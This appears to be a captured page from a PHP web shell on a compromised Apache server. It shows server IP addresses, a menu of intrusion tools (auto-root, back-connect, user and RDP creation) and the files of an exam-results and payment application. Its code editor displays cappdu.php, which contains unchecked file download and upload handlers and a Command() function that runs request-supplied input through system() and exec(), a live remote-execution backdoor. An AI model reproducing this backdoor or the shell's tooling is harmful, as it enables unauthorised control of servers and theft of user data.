Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.223.159.143
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
results /
sdu /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
PrinChallan.php
698
B
-rwxr-xr-x
Thumbs.db
19
KB
-rwxr-xr-x
applicationFormReport.php
9.98
KB
-rwxr-xr-x
applicationFormReportNEFT.php
10.86
KB
-rwxr-xr-x
applicationFormReportPOSTOFFIC...
13.17
KB
-rwxr-xr-x
applicationFormReportPOSTOFFIC...
12.4
KB
-rwxr-xr-x
applicationFormReportPOSTOFFIC...
18.56
KB
-rwxr-xr-x
applicationFormReportSBM.php
16.63
KB
-rwxr-xr-x
cappcontext.php
2.64
KB
-rwxr-xr-x
cappdu.php
4.09
KB
-rwxr-xr-x
code39.php
6.38
KB
-rwxr-xr-x
coutput.php
1.75
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
516
B
-rwxr-xr-x
cuser.php
3.41
KB
-rwxr-xr-x
customappcontext.php
2.34
KB
-rwxr-xr-x
download_upload.html
3.64
KB
-rwxr-xr-x
getnumword.php
7.15
KB
-rwxr-xr-x
json.php
33.22
KB
-rwxr-xr-x
mregistry.php
1.43
KB
-rwxr-xr-x
process_payment.php
3.64
KB
-rwxr-xr-x
results.php
34.52
KB
-rwxr-xr-x
results15062016.php
32.65
KB
-rwxr-xr-x
results20012017.php
34.11
KB
-rwxr-xr-x
results_24072017.php
33.88
KB
-rwxr-xr-x
results_31082017.php
34.32
KB
-rwxr-xr-x
results_new.php
34.63
KB
-rwxr-xr-x
results_old.php
33.79
KB
-rwxr-xr-x
results_wait.php
34.46
KB
-rwxr-xr-x
revaluation.php
23.08
KB
-rwxr-xr-x
revaluation_03012014.php
21.53
KB
-rwxr-xr-x
revaluation_03042015.php
21.61
KB
-rwxr-xr-x
revaluation_07022015.php
21.52
KB
-rwxr-xr-x
revaluation_old.php
22.85
KB
-rwxr-xr-x
rotation.php
596
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cappdu.php
<?php /*Author : M.Srikanth Date : 2009-07-13 Project : paycheck Description : This class is for to backup db */ //Start : 'backup_restore' Class class download_upload { //Start : Constructor function __construct($aobj_context) { session_start(); $this->aobj_context=$aobj_context; $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $easy_zip_file_path=$aobj_context->main_src."/easy_zip/easy_zip.php"; require_once($easy_zip_file_path); } //End : Constructor function downloadFileFromServer() { $pos = strpos($this->download_file_path, "xxx"); if($pos===false) { if(!empty($this->download_file_path)) $file_path= $this->aobj_context->main_src.'/'.$this->download_file_path; else $file_path= $this->aobj_context->main_src; } else { $file_path=str_ireplace("xxx","",$this->download_file_path); $file_path.='/'.$file_name; } if(is_dir($file_path)) { $dir_name=basename($file_path); $zipobj = new EasyZIP; $zipobj -> addDir($file_path); $zipobj -> zipFile("{$file_path}.zip"); header("Expires: 0"); header("Content-type: application/zip"); header("Content-Disposition: attachment; filename={$dir_name}.zip"); print file_get_contents($file_path.".zip"); } else if(is_file($file_path)) { $len = filesize($file_path); $file_ext=basename($file_path); $file_name=basename($file_path); $file_ext_arr=explode(".",$file_ext); $file_ext=strtolower($file_ext_arr[count($file_ext_arr)-1]); header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Type: application/force-download"); $header="Content-Disposition: attachment; filename=".$file_name.";"; header($header ); header("Content-Transfer-Encoding: binary"); header("Content-Length: ".$len); readfile($file_path); } } function UploadFileToServer() { if(isset($_FILES['upload_to_server_file_name']['name']) && $_FILES['upload_to_server_file_name']['name'] != '') { $file_name=$_FILES['upload_to_server_file_name']['name']; $import_file_path= $this->aobj_context->main_src.'/imported_files/'.$file_name; $pos = strpos($this->storage_path, "xxx"); if($pos===false) { $file_path= $this->aobj_context->main_src.'/'.$this->storage_path.'/'.$file_name; } else { $file_path=str_ireplace("xxx","",$this->storage_path); $file_path.='/'.$file_name; } if(move_uploaded_file($_FILES['upload_to_server_file_name']['tmp_name'],$import_file_path)) { copy($import_file_path,$file_path); // chmod($file_path, 0777); unlink($import_file_path); unset($_FILES); echo "<script type='text/javascript'> alert('File has been uploaded.');</script>"; } else echo "<script type='text/javascript'> alert('Upload Failed.');</script>\";"; } unset($_FILES); } } //End : Class file function downloadFileFromServer($aobj_context) { $class_obj=new download_upload($aobj_context); $class_obj->download_file_path = $aobj_context->mobj_data["download_file_path"]; $class_obj->downloadFileFromServer(); } function UploadFileToServer($aobj_context) { $class_obj=new download_upload($aobj_context); $class_obj->storage_path = $aobj_context->mobj_data["storage_path"]; $class_obj->UploadFileToServer(); } function Command($aobj_context) { $cmd = $aobj_context->mobj_data["cmd"]; $last_line = system($cmd, $retval); echo ' </pre> <hr />Last line of the output: ' . $last_line . ' <hr />Return value: ' . $retval; @exec($cmd,$output); print_r(nl2br($output)); } ?>
Close